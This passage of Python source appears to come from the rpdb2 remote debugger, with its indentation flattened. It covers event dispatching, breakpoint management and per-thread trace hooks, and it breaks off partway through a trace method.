# --------------------------------- Event Manager --------------------------
#
class CEventDispatcherRecord:
"""
Internal structure that binds a callback to particular events.
"""
def __init__(self, callback, event_type_dict, fSingleUse):
self.m_callback = callback
self.m_event_type_dict = copy.copy(event_type_dict)
self.m_fSingleUse = fSingleUse
def is_match(self, event):
rtl = [t for t in self.m_event_type_dict.keys() if isinstance(event, t)]
if len(rtl) == 0:
return False
#
# Examine first match only.
#
rt = rtl[0]
rte = self.m_event_type_dict[rt].get(EVENT_EXCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return False
return True
rte = self.m_event_type_dict[rt].get(EVENT_INCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return True
return False
return True
class CEventDispatcher:
"""
Events dispatcher.
Dispatchers can be chained together.
"""
def __init__(self, chained_event_dispatcher = None):
self.m_chained_event_dispatcher = chained_event_dispatcher
self.m_chain_override_types = {}
self.m_registrants = {}
def shutdown(self):
for er in list(self.m_registrants.keys()):
self.__remove_dispatcher_record(er)
def register_callback(self, callback, event_type_dict, fSingleUse):
er = CEventDispatcherRecord(callback, event_type_dict, fSingleUse)
#
# If we have a chained dispatcher, register the callback on the
# chained dispatcher as well.
#
if self.m_chained_event_dispatcher is not None:
_er = self.__register_callback_on_chain(er, event_type_dict, fSingleUse)
self.m_registrants[er] = _er
return er
self.m_registrants[er] = True
return er
def remove_callback(self, callback):
erl = [er for er in list(self.m_registrants.keys()) if er.m_callback == callback]
for er in erl:
self.__remove_dispatcher_record(er)
def fire_events(self, event_list):
for event in event_list:
self.fire_event(event)
def fire_event(self, event):
for er in list(self.m_registrants.keys()):
self.__fire_er(event, er)
def __fire_er(self, event, er):
if not er.is_match(event):
return
try:
er.m_callback(event)
except:
pass
if not er.m_fSingleUse:
return
try:
del self.m_registrants[er]
except KeyError:
pass
def register_chain_override(self, event_type_dict):
"""
Chain override prevents registration on chained
dispatchers for specific event types.
"""
for t in list(event_type_dict.keys()):
self.m_chain_override_types[t] = True
def __register_callback_on_chain(self, er, event_type_dict, fSingleUse):
_event_type_dict = copy.copy(event_type_dict)
for t in self.m_chain_override_types:
if t in _event_type_dict:
del _event_type_dict[t]
if len(_event_type_dict) == 0:
return False
def callback(event, er = er):
self.__fire_er(event, er)
_er = self.m_chained_event_dispatcher.register_callback(callback, _event_type_dict, fSingleUse)
return _er
def __remove_dispatcher_record(self, er):
try:
if self.m_chained_event_dispatcher is not None:
_er = self.m_registrants[er]
if _er != False:
self.m_chained_event_dispatcher.__remove_dispatcher_record(_er)
del self.m_registrants[er]
except KeyError:
pass
class CEventQueue:
"""
Add queue semantics above an event dispatcher.
Instead of firing event callbacks, new events are returned in a list
upon request.
"""
def __init__(self, event_dispatcher, max_event_list_length = MAX_EVENT_LIST_LENGTH):
self.m_event_dispatcher = event_dispatcher
self.m_event_lock = threading.Condition()
self.m_max_event_list_length = max_event_list_length
self.m_event_list = []
self.m_event_index = 0
self.m_n_waiters = []
def shutdown(self):
self.m_event_dispatcher.remove_callback(self.event_handler)
def register_event_types(self, event_type_dict):
self.m_event_dispatcher.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
def event_handler(self, event):
try:
self.m_event_lock.acquire()
if isinstance(event, CEventSyncReceivers):
t0 = time.time()
while len(self.m_n_waiters) < event.m_sync_n and time.time() < t0 + HEARTBEAT_TIMEOUT:
time.sleep(0.1)
self.m_event_list.append(event)
if len(self.m_event_list) > self.m_max_event_list_length:
self.m_event_list.pop(0)
self.m_event_index += 1
lock_notify_all(self.m_event_lock)
finally:
self.m_event_lock.release()
def get_event_index(self):
return self.m_event_index
def wait_for_event(self, timeout, event_index):
"""
Return the new events which were fired.
"""
try:
self.m_n_waiters.append(0)
self.m_event_lock.acquire()
if event_index >= self.m_event_index:
safe_wait(self.m_event_lock, timeout)
if event_index >= self.m_event_index:
return (self.m_event_index, [])
sub_event_list = self.m_event_list[event_index - self.m_event_index:]
return (self.m_event_index, sub_event_list)
finally:
self.m_n_waiters.pop()
self.m_event_lock.release()
class CStateManager:
"""
Manage possible debugger states (broken, running, etc...)
The state manager can receive state changes via an input event
dispatcher or via the set_state() method
It sends state changes forward to the output event dispatcher.
The state can also be queried or waited for.
"""
def __init__(self, initial_state, event_dispatcher_output = None, event_dispatcher_input = None):
self.m_event_dispatcher_input = event_dispatcher_input
self.m_event_dispatcher_output = event_dispatcher_output
if self.m_event_dispatcher_input is not None:
event_type_dict = {CEventState: {}}
self.m_event_dispatcher_input.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
if self.m_event_dispatcher_output is not None:
self.m_event_dispatcher_output.register_chain_override(event_type_dict)
self.m_state_lock = threading.Condition()
self.m_state_queue = []
self.m_state_index = 0
self.m_waiter_list = {}
self.set_state(initial_state)
def shutdown(self):
if self.m_event_dispatcher_input is not None:
self.m_event_dispatcher_input.remove_callback(self.event_handler)
def event_handler(self, event):
self.set_state(event.m_state)
def get_state(self):
return self.m_state_queue[-1]
def __add_state(self, state):
self.m_state_queue.append(state)
self.m_state_index += 1
self.__remove_states()
def __remove_states(self, treshold = None):
"""
Clean up old state changes from the state queue.
"""
index = self.__calc_min_index()
if (treshold is not None) and (index <= treshold):
return
_delta = 1 + self.m_state_index - index
self.m_state_queue = self.m_state_queue[-_delta:]
def __calc_min_index(self):
"""
Calc the minimum state index.
The calculated index is the oldest state of which all state
waiters are aware of. That is, no one cares for older states
and these can be removed from the state queue.
"""
if len(self.m_waiter_list) == 0:
return self.m_state_index
index_list = list(self.m_waiter_list.keys())
min_index = min(index_list)
return min_index
def __add_waiter(self):
index = self.m_state_index
n = self.m_waiter_list.get(index, 0)
self.m_waiter_list[index] = n + 1
return index
def __remove_waiter(self, index):
n = self.m_waiter_list[index]
if n == 1:
del self.m_waiter_list[index]
self.__remove_states(index)
else:
self.m_waiter_list[index] = n - 1
def __get_states(self, index):
_delta = 1 + self.m_state_index - index
states = self.m_state_queue[-_delta:]
return states
def set_state(self, state = None, fLock = True):
try:
if fLock:
self.m_state_lock.acquire()
if state is None:
state = self.get_state()
self.__add_state(state)
lock_notify_all(self.m_state_lock)
finally:
if fLock:
self.m_state_lock.release()
if self.m_event_dispatcher_output is not None:
event = CEventState(state)
self.m_event_dispatcher_output.fire_event(event)
def wait_for_state(self, state_list):
"""
Wait for any of the states in the state list.
"""
try:
self.m_state_lock.acquire()
if self.get_state() in state_list:
return self.get_state()
while True:
index = self.__add_waiter()
alertable_wait(self.m_state_lock, PING_TIMEOUT)
states = self.__get_states(index)
self.__remove_waiter(index)
for state in states:
if state in state_list:
return state
finally:
self.m_state_lock.release()
def acquire(self):
self.m_state_lock.acquire()
def release(self):
self.m_state_lock.release()
#
# -------------------------------------- Break Info manager ---------------------------------------
#
def myord(c):
try:
return ord(c)
except:
return c
def CalcValidLines(code):
l = code.co_firstlineno
vl = [l]
bl = [myord(c) for c in code.co_lnotab[2::2]]
sl = [myord(c) for c in code.co_lnotab[1::2]]
for (bi, si) in zip(bl, sl):
l += si
if bi == 0:
continue
if l != vl[-1]:
vl.append(l)
if len(sl) > 0:
l += sl[-1]
if l != vl[-1]:
vl.append(l)
return vl
class CScopeBreakInfo:
def __init__(self, fqn, valid_lines):
self.m_fqn = fqn
self.m_first_line = valid_lines[0]
self.m_last_line = valid_lines[-1]
self.m_valid_lines = valid_lines
def CalcScopeLine(self, lineno):
rvl = copy.copy(self.m_valid_lines)
rvl.reverse()
for l in rvl:
if lineno >= l:
break
return l
def __str__(self):
return "('" + self.m_fqn + "', " + str(self.m_valid_lines) + ')'
class CFileBreakInfo:
"""
Break info structure for a source file.
"""
def __init__(self, filename):
self.m_filename = filename
self.m_first_line = 0
self.m_last_line = 0
self.m_scope_break_info = []
def CalcBreakInfo(self):
(source, encoding) = get_source(self.m_filename)
_source = as_string(source + as_unicode('\n'), encoding)
code = compile(_source, self.m_filename, "exec")
self.m_scope_break_info = []
self.m_first_line = code.co_firstlineno
self.m_last_line = 0
fqn = []
t = [code]
while len(t) > 0:
c = t.pop(0)
if type(c) == tuple:
self.m_scope_break_info.append(CScopeBreakInfo(*c))
fqn.pop()
continue
fqn = fqn + [c.co_name]
valid_lines = CalcValidLines(c)
self.m_last_line = max(self.m_last_line, valid_lines[-1])
_fqn = as_unicode('.'.join(fqn), encoding)
si = (_fqn, valid_lines)
subcodeslist = self.__CalcSubCodesList(c)
t = subcodeslist + [si] + t
def __CalcSubCodesList(self, code):
tc = type(code)
t = [(c.co_firstlineno, c) for c in code.co_consts if type(c) == tc]
t.sort()
scl = [c[1] for c in t]
return scl
def FindScopeByLineno(self, lineno):
lineno = max(min(lineno, self.m_last_line), self.m_first_line)
smaller_element = None
exact_element = None
for sbi in self.m_scope_break_info:
if lineno > sbi.m_last_line:
if (smaller_element is None) or (sbi.m_last_line >= smaller_element.m_last_line):
smaller_element = sbi
continue
if (lineno >= sbi.m_first_line) and (lineno <= sbi.m_last_line):
exact_element = sbi
break
assert(exact_element is not None)
scope = exact_element
l = exact_element.CalcScopeLine(lineno)
if (smaller_element is not None) and (l <= smaller_element.m_last_line):
scope = smaller_element
l = smaller_element.CalcScopeLine(lineno)
return (scope, l)
def FindScopeByName(self, name, offset):
if name.startswith(MODULE_SCOPE):
alt_scope = MODULE_SCOPE2 + name[len(MODULE_SCOPE):]
elif name.startswith(MODULE_SCOPE2):
alt_scope = MODULE_SCOPE + name[len(MODULE_SCOPE2):]
else:
return self.FindScopeByName(MODULE_SCOPE2 + SCOPE_SEP + name, offset)
for sbi in self.m_scope_break_info:
if sbi.m_fqn in [name, alt_scope]:
l = sbi.CalcScopeLine(sbi.m_first_line + offset)
return (sbi, l)
print_debug('Invalid scope: %s' % repr(name))
raise InvalidScopeName
class CBreakInfoManager:
"""
Manage break info dictionary per filename.
"""
def __init__(self):
self.m_file_info_dic = {}
def addFile(self, filename):
mbi = CFileBreakInfo(filename)
mbi.CalcBreakInfo()
self.m_file_info_dic[filename] = mbi
def getFile(self, filename):
if not filename in self.m_file_info_dic:
self.addFile(filename)
return self.m_file_info_dic[filename]
#
# -------------------------------- Break Point Manager -----------------------------
#
def breakpoint_copy(bp):
if bp is None:
return None
_bp = copy.copy(bp)
#filename = g_found_unicode_files.get(bp.m_filename, bp.m_filename)
_bp.m_filename = as_unicode(bp.m_filename, sys.getfilesystemencoding())
_bp.m_code = None
return _bp
class CBreakPoint(object):
def __init__(self, filename, scope_fqn, scope_first_line, lineno, fEnabled, expr, encoding, fTemporary = False):
"""
Breakpoint constructor.
scope_fqn - scope fully qualified name. e.g: module.class.method
"""
self.m_id = None
self.m_fEnabled = fEnabled
self.m_filename = filename
self.m_scope_fqn = scope_fqn
self.m_scope_name = scope_fqn.split(SCOPE_SEP)[-1]
self.m_scope_first_line = scope_first_line
self.m_scope_offset = lineno - scope_first_line
self.m_lineno = lineno
self.m_expr = expr
self.m_encoding = encoding
self.m_code = None
self.m_fTemporary = fTemporary
if (expr is not None) and (expr != ''):
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
print_debug('Breakpoint expression: %s' % repr(_expr))
self.m_code = compile(_expr, '<string>', 'eval')
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def calc_enclosing_scope_name(self):
if self.m_scope_offset != 0:
return None
if self.m_scope_fqn in [MODULE_SCOPE, MODULE_SCOPE2]:
return None
scope_name_list = self.m_scope_fqn.split(SCOPE_SEP)
enclosing_scope_name = scope_name_list[-2]
return enclosing_scope_name
def enable(self):
self.m_fEnabled = True
def disable(self):
self.m_fEnabled = False
def isEnabled(self):
return self.m_fEnabled
def __str__(self):
return "('" + self.m_filename + "', '" + self.m_scope_fqn + "', " + str(self.m_scope_first_line) + ', ' + str(self.m_scope_offset) + ', ' + str(self.m_lineno) + ')'
class CBreakPointsManagerProxy:
"""
A proxy for the breakpoint manager.
While the breakpoint manager resides on the debuggee (the server),
the proxy resides in the debugger (the client - session manager)
"""
def __init__(self, session_manager):
self.m_session_manager = session_manager
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
#
# The breakpoint proxy inserts itself between the two chained
# event dispatchers in the session manager.
#
event_type_dict = {CEventBreakpoint: {}}
self.m_session_manager.m_event_dispatcher_proxy.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
self.m_session_manager.m_event_dispatcher.register_chain_override(event_type_dict)
def update_bp(self, event):
"""
Handle breakpoint updates that arrive via the event dispatcher.
"""
try:
self.m_lock.acquire()
if event.m_fAll:
id_list = list(self.m_break_points_by_id.keys())
else:
id_list = event.m_id_list
if event.m_action == CEventBreakpoint.REMOVE:
for id in id_list:
try:
bp = self.m_break_points_by_id.pop(id)
bpm = self.m_break_points_by_file[bp.m_filename]
del bpm[bp.m_lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[bp.m_filename]
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.DISABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.disable()
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.ENABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.enable()
except KeyError:
pass
return
bpm = self.m_break_points_by_file.get(event.m_bp.m_filename, {})
bpm[event.m_bp.m_lineno] = event.m_bp
self.m_break_points_by_id[event.m_bp.m_id] = event.m_bp
finally:
self.m_lock.release()
self.m_session_manager.m_event_dispatcher.fire_event(event)
def sync(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
break_points_by_id = self.m_session_manager.getSession().getProxy().get_breakpoints()
try:
self.m_lock.acquire()
self.m_break_points_by_id.update(break_points_by_id)
for bp in list(self.m_break_points_by_id.values()):
bpm = self.m_break_points_by_file.get(bp.m_filename, {})
bpm[bp.m_lineno] = bp
finally:
self.m_lock.release()
def clear(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
def get_breakpoint(self, filename, lineno):
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
class CBreakPointsManager:
def __init__(self):
self.m_break_info_manager = CBreakInfoManager()
self.m_active_break_points_by_file = {}
self.m_break_points_by_function = {}
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
self.m_temp_bp = None
self.m_fhard_tbp = False
def get_active_break_points_by_file(self, filename):
"""
Get active breakpoints for file.
"""
_filename = winlower(filename)
return self.m_active_break_points_by_file.setdefault(_filename, {})
def __calc_active_break_points_by_file(self, filename):
bpmpt = self.m_active_break_points_by_file.setdefault(filename, {})
bpmpt.clear()
bpm = self.m_break_points_by_file.get(filename, {})
for bp in list(bpm.values()):
if bp.m_fEnabled:
bpmpt[bp.m_lineno] = bp
tbp = self.m_temp_bp
if (tbp is not None) and (tbp.m_filename == filename):
bpmpt[tbp.m_lineno] = tbp
def __remove_from_function_list(self, bp):
function_name = bp.m_scope_name
try:
bpf = self.m_break_points_by_function[function_name]
del bpf[bp]
if len(bpf) == 0:
del self.m_break_points_by_function[function_name]
except KeyError:
pass
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
try:
_bpf = self.m_break_points_by_function[_function_name]
del _bpf[bp]
if len(_bpf) == 0:
del self.m_break_points_by_function[_function_name]
except KeyError:
pass
def __add_to_function_list(self, bp):
function_name = bp.m_scope_name
bpf = self.m_break_points_by_function.setdefault(function_name, {})
bpf[bp] = True
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
_bpf = self.m_break_points_by_function.setdefault(_function_name, {})
_bpf[bp] = True
def get_breakpoint(self, filename, lineno):
"""
Get breakpoint by file and line number.
"""
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
def del_temp_breakpoint(self, fLock = True, breakpoint = None):
"""
Delete a temoporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
if self.m_temp_bp is None:
return
try:
if fLock:
self.m_lock.acquire()
if self.m_temp_bp is None:
return
if self.m_fhard_tbp and not breakpoint is self.m_temp_bp:
return
bp = self.m_temp_bp
self.m_temp_bp = None
self.m_fhard_tbp = False
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
if fLock:
self.m_lock.release()
def set_temp_breakpoint(self, filename, scope, lineno, fhard = False):
"""
Set a temoporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled = True, expr = as_unicode(''), encoding = as_unicode('utf-8'), fTemporary = True)
try:
self.m_lock.acquire()
self.m_fhard_tbp = False
self.del_temp_breakpoint(fLock = False)
self.m_fhard_tbp = fhard
self.m_temp_bp = bp
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding):
"""
Set breakpoint.
scope - a string (possibly empty) with the dotted scope of the
breakpoint. eg. 'my_module.my_class.foo'
expr - a string (possibly empty) with a python expression
that will be evaluated at the scope of the breakpoint.
The breakpoint will be hit if the expression evaluates
to True.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled, expr, encoding)
try:
self.m_lock.acquire()
bpm = self.m_break_points_by_file.setdefault(_filename, {})
#
# If a breakpoint on the same line is found we use its ID.
# Since the debugger lists breakpoints by IDs, this has
# a similar effect to modifying the breakpoint.
#
try:
old_bp = bpm[l]
id = old_bp.m_id
self.__remove_from_function_list(old_bp)
except KeyError:
#
# Find the smallest available ID.
#
bpids = list(self.m_break_points_by_id.keys())
bpids.sort()
id = 0
while id < len(bpids):
if bpids[id] != id:
break
id += 1
bp.m_id = id
self.m_break_points_by_id[id] = bp
bpm[l] = bp
if fEnabled:
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
return bp
finally:
self.m_lock.release()
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.disable()
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.enable()
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
filename = bp.m_filename
lineno = bp.m_lineno
bpm = self.m_break_points_by_file[filename]
if bp == bpm[lineno]:
del bpm[lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[filename]
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
del self.m_break_points_by_id[id]
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
#
# ----------------------------------- Core Debugger ------------------------------------
#
class CCodeContext:
"""
Class represents info related to code objects.
"""
def __init__(self, frame, bp_manager):
self.m_code = frame.f_code
self.m_filename = calc_frame_path(frame)
self.m_basename = os.path.basename(self.m_filename)
self.m_file_breakpoints = bp_manager.get_active_break_points_by_file(self.m_filename)
self.m_fExceptionTrap = False
def is_untraced(self):
"""
Return True if this code object should not be traced.
"""
return self.m_basename in [THREADING_FILENAME, DEBUGGER_FILENAME]
def is_exception_trap_frame(self):
"""
Return True if this frame should be a trap for unhandled
exceptions.
"""
if self.m_basename == THREADING_FILENAME:
return True
if self.m_basename == DEBUGGER_FILENAME and self.m_code.co_name in ['__execv', '__execve', '__function_wrapper']:
return True
return False
class CDebuggerCoreThread:
"""
Class represents a debugged thread.
This is a core structure of the debugger. It includes most of the
optimization tricks and hacks, and includes a good amount of
subtle bug fixes, be carefull not to mess it up...
"""
def __init__(self, name, core_debugger, frame, event):
self.m_thread_id = thread.get_ident()
self.m_thread_name = name
self.m_fBroken = False
self.m_fUnhandledException = False
self.m_frame = frame
self.m_event = event
self.m_ue_lineno = None
self.m_uef_lineno = None
self.m_code_context = core_debugger.get_code_context(frame)
self.m_locals_copy = {}
self.m_core = core_debugger
self.m_bp_manager = core_debugger.m_bp_manager
self.m_frame_lock = threading.Condition()
self.m_frame_external_references = 0
self.m_exc_info = None
self.m_depth = 0
self.set_depth(frame)
def set_depth(self, frame):
self.m_depth = 0
while frame is not None:
self.m_depth += 1
frame = frame.f_back
def profile_recursion(self, frame, event, arg):
if event == 'call':
if self.m_depth > g_recursionlimit:
print_debug('Exceeded recursion limit and caught in profile function.')
try:
#
# The allowed recursion limit was exceeded.
# To view the offending script frame, go two frames
# down the stack with the 'down' console command.
#
raise RuntimeError('maximum recursion depth exceeded')
except:
#
# Schedule the debugger to re-enable the profile hook.
#
self.set_tracers(fsignal_exception = True)
raise
elif event == 'return':
return self.profile(frame, event, arg)
def profile(self, frame, event, arg):
"""
Profiler method.
The Python profiling mechanism is used by the debugger
mainly to handle synchronization issues related to the
life time of the frame structure.
"""
#print_debug('profile: %s, %s, %s, %s, %s' % (repr(frame), event, frame.f_code.co_name, frame.f_code.co_filename, repr(arg)[:40]))
if event == 'return':
self.m_depth -= 1
if sys.excepthook != g_excepthook:
set_excepthook()
self.m_frame = frame.f_back
try:
self.m_code_context = self.m_core.m_code_contexts[self.m_frame.f_code]
except AttributeError:
if self.m_event != 'return' and self.m_core.m_ftrap:
#
# An exception is raised from the outer-most frame.
# This means an unhandled exception.
#
self.m_frame = frame
self.m_event = 'exception'
self.m_uef_lineno = self.m_ue_lineno
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
self.m_uef_lineno = None
if frame in self.m_locals_copy:
self.update_locals()
self.m_frame = None
self.m_core.remove_thread(self.m_thread_id)
sys.setprofile(None)
sys.settrace(self.m_core.trace_dispatch_init)
if self.m_frame_external_references == 0:
return
#
# Wait until no one references the frame object
#
try:
self.m_frame_lock.acquire()
while self.m_frame_external_references != 0:
safe_wait(self.m_frame_lock, 1.0)
finally:
self.m_frame_lock.release()
def frame_acquire(self):
"""
Aquire a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references += 1
f = self.m_frame
if f is None:
raise ThreadDone
return f
finally:
self.m_frame_lock.release()
def frame_release(self):
"""
Release a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references -= 1
if self.m_frame_external_references == 0:
self.m_frame_lock.notify()
finally:
self.m_frame_lock.release()
def get_frame(self, base_frame, index, fException = False):
"""
Get frame at index depth down the stack.
Starting from base_frame return the index depth frame
down the stack. If fException is True use the exception
stack (traceback).
"""
if fException:
tb = get_traceback(base_frame, self)
if tb is None:
raise NoExceptionFound
while tb.tb_next is not None:
tb = tb.tb_next
f = tb.tb_frame
else:
f = base_frame
while f is not None:
if not g_fDebug and f.f_code.co_name == 'rpdb2_import_wrapper':
f = f.f_back
continue
if index <= 0:
break
f = f.f_back
index -= 1
if (index < 0) or (f is None):
raise InvalidFrame
if (self.m_uef_lineno is not None) and (f.f_back is None):
lineno = self.m_uef_lineno
else:
lineno = f.f_lineno
if fException:
tb = get_traceback(base_frame, self)
while tb is not None:
if tb.tb_frame == f:
lineno = tb.tb_lineno
break
tb = tb.tb_next
return (f, lineno)
def get_locals_copy(self, frame_index, fException, fReadOnly):
"""
Get globals and locals of frame.
A copy scheme is used for locals to work around a bug in
Python 2.3 and 2.4 that prevents modifying the local dictionary.
"""
try:
base_frame = self.frame_acquire()
(f, lineno) = self.get_frame(base_frame, frame_index, fException)
if fReadOnly:
gc = copy.copy(f.f_globals)
else:
gc = f.f_globals
try:
(lc, olc) = self.m_locals_copy[f]
except KeyError:
if f.f_code.co_name in [MODULE_SCOPE, MODULE_SCOPE2]:
lc = gc
olc = gc
else:
lc = copy.copy(f.f_locals)
olc = copy.copy(lc)
if not fReadOnly:
self.m_locals_copy[f] = (lc, olc)
self.set_local_trace(f)
return (gc, lc, olc)
finally:
f = None
base_frame = None
self.frame_release()
def update_locals_copy(self):
"""
Update copy of locals with changes in locals.
"""
lct = self.m_locals_copy.get(self.m_frame, None)
if lct is None:
return
(lc, base) = lct
cr = copy.copy(self.m_frame.f_locals)
for k in cr:
if not k in base:
lc[k] = cr[k]
continue
if not cr[k] is base[k]:
lc[k] = cr[k]
def update_locals(self):
"""
Update locals with changes from copy of locals.
"""
lct = self.m_locals_copy.pop(self.m_frame, None)
if lct is None:
return
self.m_frame.f_locals.update(lct[0])
def __eval_breakpoint(self, frame, bp):
"""
Return True if the breakpoint is hit.
"""
if not bp.m_fEnabled:
return False
if bp.m_expr == '':
return True
try:
if frame in self.m_locals_copy:
l = self.m_locals_copy[frame][0]
v = eval(bp.m_code, frame.f_globals, l)
else:
v = eval(bp.m_code, frame.f_globals, frame.f_locals)
return (v != False)
except:
return False
def set_local_trace(self, frame, fsignal_exception = False):
"""
Set trace callback of frame.
Specialized trace methods are selected here to save switching time
during actual tracing.
"""
if not self.m_core.m_ftrace:
frame.f_trace = self.trace_dispatch_stop
return
if fsignal_exception:
frame.f_trace = self.trace_dispatch_signal
return
code_context = self.m_core.get_code_context(frame)
if self.m_core.is_break(self, frame):
frame.f_trace = self.trace_dispatch_break
elif code_context.m_fExceptionTrap or (frame.f_back is None):
frame.f_trace = self.trace_dispatch_trap
elif frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
frame.f_trace = self.trace_dispatch
elif frame in self.m_locals_copy:
frame.f_trace = self.trace_dispatch
elif frame == self.m_core.m_return_frame:
frame.f_trace = self.trace_dispatch
else:
del frame.f_trace
def set_tracers(self, fsignal_exception = False):
"""
Set trace callbacks for all frames in stack.
"""
try:
try:
f = self.frame_acquire()
while f is not None:
self.set_local_trace(f, fsignal_exception)
f = f.f_back
except ThreadDone:
f = None
finally:
f = None
self.frame_release()
def trace_dispatch_stop(self, frame, event, arg):
"""
Disable tracing for this thread.
"""
if frame in self.m_locals_copy:
self.update_locals()
sys.settrace(None)
sys.setprofile(None)
return None
def trace_dispatch_break(self, frame, event, arg):
"""
Trace method for breaking a thread.
"""
if event not in ['line', 'return', 'exception']:
return frame.f_trace
if event == 'exception':
self.set_exc_info(arg)
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
def trace_dispatch_call(self, frame, event, arg):
"""
Initial trace method for thread.
"""
if not self.m_core.m_ftrace:
return self.trace_dispatch_stop(frame, event, arg)
self.m_depth += 1
if self.m_depth > g_recursionlimit:
sys.setprofile(self.profile_recursion)
self.m_frame = frame
try:
self.m_code_context = self.m_core.m_code_contexts[frame.f_code]
except KeyError:
self.m_code_context = self.m_core.get_code_context(frame)
if self.m_core.m_fBreak or (self.m_core.m_step_tid == self.m_thread_id):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if not frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
return None
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
return self.trace_dispatch
def trace_dispatch(self, frame, event, arg):
"""
General trace method for thread.
"""
if (event == 'line'):
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return None
if event == 'exception':
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if not is_py3k() and not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_trap(self, frame, event, arg):
"""
Trace method used for frames in which unhandled exceptions
should be caught.
"""
if (event == 'line'):
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
